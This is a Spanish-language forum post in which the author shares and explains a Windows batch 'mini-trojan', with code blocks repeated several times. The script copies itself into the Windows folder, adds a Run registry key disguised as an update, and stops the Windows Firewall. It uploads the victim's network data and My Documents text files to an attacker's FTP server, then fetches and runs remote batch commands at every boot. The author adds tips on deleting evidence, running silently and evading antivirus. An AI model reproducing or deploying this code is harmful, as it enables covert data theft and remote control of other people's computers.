Código:
Bueno creo este tema porque tengo unas cuantas dudas, estoy haciendo una especie de "troyano", por Batch.
Y quiero saber como lo puedo meter al registro de Windows, para que cada vez que se inicie se re-active.
También cómo poner un archivo llamado por ejemplo "órdenes" en el servidor y que lo abra y lo haga, como por ejemplo copiar un archivo del pc y mandarlo al servidor.
Y una última cosa, igual suena raro, pero por si es posible, quisiera saber si es posible que el batch al ejecutarse lo haga de forma silenciosa y no se vea que sube los archivos y eso....
El código:
[code] @echo off
set user=XXXX
set pass=XXXXX
set dominio=XXXXXXX
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put info.txt>>datos.txt
echo bye>>datos.txt
ipconfig>>info.txt
ftp -s:datos.txt
del info.txt
del datos.txt
exit
Y quiero saber como lo puedo meter al registro de Windows, para que cada vez que se inicie se re-active.
También cómo poner un archivo llamado por ejemplo "órdenes" en el servidor y que lo abra y lo haga, como por ejemplo copiar un archivo del pc y mandarlo al servidor.
Y una última cosa, igual suena raro, pero por si es posible, quisiera saber si es posible que el batch al ejecutarse lo haga de forma silenciosa y no se vea que sube los archivos y eso....
El código:
[code] @echo off
set user=XXXX
set pass=XXXXX
set dominio=XXXXXXX
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put info.txt>>datos.txt
echo bye>>datos.txt
ipconfig>>info.txt
ftp -s:datos.txt
del info.txt
del datos.txt
exit
Como ven es simple, pero básicamente es la primera cosa un poco decente que hago de batch.
Un saludo,
Edito: en ese código, el ejemplo a subir fue la IP , y los datos que te da al poner "ipconfig" en el ms-dos.
E D I TO :
Aquí el código del Mini-Troyano .
Código:
@echo off
copy /y "%~dpnx0" "%windir%\"
reg add HKLM\software\microsoft\windows\currentversion\run /v "Actualización" /d C:\WINDOWS\Actualización.bat /f
cd \
net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"
set user=XXXXXX
set pass=XXXXXX
set dominio=XXXXXX
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo put %homedrive%%homepath%\Mis Documentos\*.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt
ipconfig>>%USERNAME%.txt
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat
del %USERNAME%.txt
del datos.txt
pause>nul
exit
copy /y "%~dpnx0" "%windir%\"
reg add HKLM\software\microsoft\windows\currentversion\run /v "Actualización" /d C:\WINDOWS\Actualización.bat /f
cd \
net stop "Firewall de Windows/Conexi¢n compartida a Internet (ICS)"
set user=XXXXXX
set pass=XXXXXX
set dominio=XXXXXX
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo put %homedrive%%homepath%\Mis Documentos\*.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt
ipconfig>>%USERNAME%.txt
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat
del %USERNAME%.txt
del datos.txt
pause>nul
exit
Primero se copia a la carpeta de Windows ( por si es borrado ), y luego se añade al registro de Windows.
Después por si tienen el Firewall de Windows y este detecta las conexiones FTP, pues lo desactiva. ( Obviamente con otro Firewall no funcionaría )
Luego en donde las XXXX, ponemos los datos.
Código:
echo open %dominio%>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt
echo %user%>>datos.txt
echo %pass%>>datos.txt
echo put %USERNAME%.txt>>datos.txt
echo get ordenes.bat C:\WINDOWS\system32\ordenes.bat>>datos.txt
echo bye>>datos.txt
Ese trozo es la información que tendrá que hacerse en cuanto se abra el FTP, primero se conecta, luego subirá el archivo %USERNAME% que justo debajo sale, subirá la IP de la víctima. ( eso es un ejemplo si queréis podéis quitarlo ), y luego descargará el archivo ordenes.bat, que tendremos que poner en nuestro servidor FTP, para que se descargue.( este se ponrá en la carpeta de system32)
Código:
ipconfig>>%USERNAME%.txt
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat
del %USERNAME%.txt
del datos.txt
pause>nul
exit
ftp -s:datos.txt
start C:\WINDOWS\system32\ordenes.bat
del %USERNAME%.txt
del datos.txt
pause>nul
exit
Aquí creará el archivo %username% ( nombre del usuario ), con dentro la ip, esto lo tomé como ejemplo, como dije podéis borrarlo y usar solo las ordenes mediante el archivo ordenes.bat
Luego ftp-s:datos.txt, es el archivo que leerá el sistema para entrar al ftp y relizar las ordenes.
Luego en start ........ordenes.bat, lo que hace es abrir el archivo ordenes.bat y ahí pondremos lo que queramos, el nombre tiene que ser ordenes y extensión .bat, si no no funcionará pero podéis cambiarlo y que se descargue lo que sea. Y obviamente, tiene que ser en lenguaje BATCH. ( como dije, podéis subir lo que queráis, una foto, un .exe, pero tenéis que cambiar el código). El archivo ordenes se abrirá cada reinicio, así que tenéis que cambiarlo si queréis realizar otras acciones.
Luego para no dejar pruebas evidentes, se borra el archivo username, y datos.
Si algo no funciona o hay alguna duda, aquí estoy.
Se me olvidaba, para que haga todo de manera silenciosa ( sin aparecer en pantalla ) tenéis que usar un compilador, como Quick Batch File Compiler. Y en opciones modo Ghost. Yo uso uno portable, raro el que se instalaba me detectaba como virus el avast... no se porqué... pero si cambiáis el nombre o algo a veces deja...
Saludos.
[/code]